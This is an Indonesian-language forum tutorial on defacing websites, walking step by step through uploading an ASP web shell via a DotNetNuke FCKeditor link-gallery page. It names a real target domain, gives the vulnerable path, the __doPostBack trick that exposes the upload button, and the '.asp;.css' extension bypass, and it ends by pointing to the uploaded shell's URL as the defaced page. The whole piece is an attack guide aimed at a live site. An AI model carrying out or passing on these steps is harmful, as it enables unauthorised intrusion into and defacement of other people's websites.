Deface Metoda Upload :aspx Deface Metoda Upload :aspx

Oke...sengaja ane share tutorial Hacking
oke, ke TKP !

Contoh : http://fril.co.il/portals/0/BiBoTsMeNtArIe.asp;.css

ga usah pake lah pake dork, langsung aje gw mw ngasih.

1. siapkan halam web yang ingin kita deface
2. untuk kali ini saya rekomendasikan untuk menggunakan [ http://fril.co.il/ ]
3. tambahkan kalimat ini : "providers/htmleditorproviders/fck/fcklinkgallery.

aspx
4. sehingga akan menjadi seperti ini :
"http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
5. oke sekarang ada halaman yang kurang lebih akan seperti ini
6. lalu klik lah "(File (A file on your site" nih pic nya
7. setelah nge klik itu, tnggu loading selesai baru kita harus
ganti alamat protocol website nya . . ga ngerti ??
nah kan tadi alamat nya "http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx" nah kita ganti bro jadi
"javascript:__doPostBack('ctlURL$cmdUpload','')" => [ tanpa tanda kutip 2 ]

8. ntar keluar sendiri tuh, tombol browse kaya gni pic nya :

9. nah kita upload deh, shell yang mau kita masukin
kalo ga punya shell, pake shell buatan ane aja

oiya PENTING NIH !! file yg bisa di upload antara lain :

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,

so, klo mw pake shell buatan gw kan ekstensi nya masih [.txt]
kita ubah langsung, sebelum upload ubah ekstensi nya menjadi css
misal : contohnamashell.asp;.css ingat ! kita harus menambahkan titik nya dua kali [ contohnamashell(.)asp(;)[.css] ] sehingga . .
yang tadi nya shell gw bernama "neutronxscript.txt" harus ente rubah nama neutron nya terserah tetapi pastikan berakhiran ".asp;.css" misal : "contohnamashell.asp;.css"

10. upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "contohnamashell.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]

11. nah, cakep tuh gan kita rubah alamat "http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi" http://fril.co.il/portals/0/BiBoTsMeNtArIe.asp;.css" intinya kita harus menambahkan "/portals/0/BiBoTsMeNtArIe.asp;.css" pada akhir "http:/fril.co.il/"

12. selamat, anda berhasil defaced !!
sebelumnya ane minta maaf klo banyak kekurangan dalam posting ini

-------------------------------------------------------------------------------------------


Thanks.......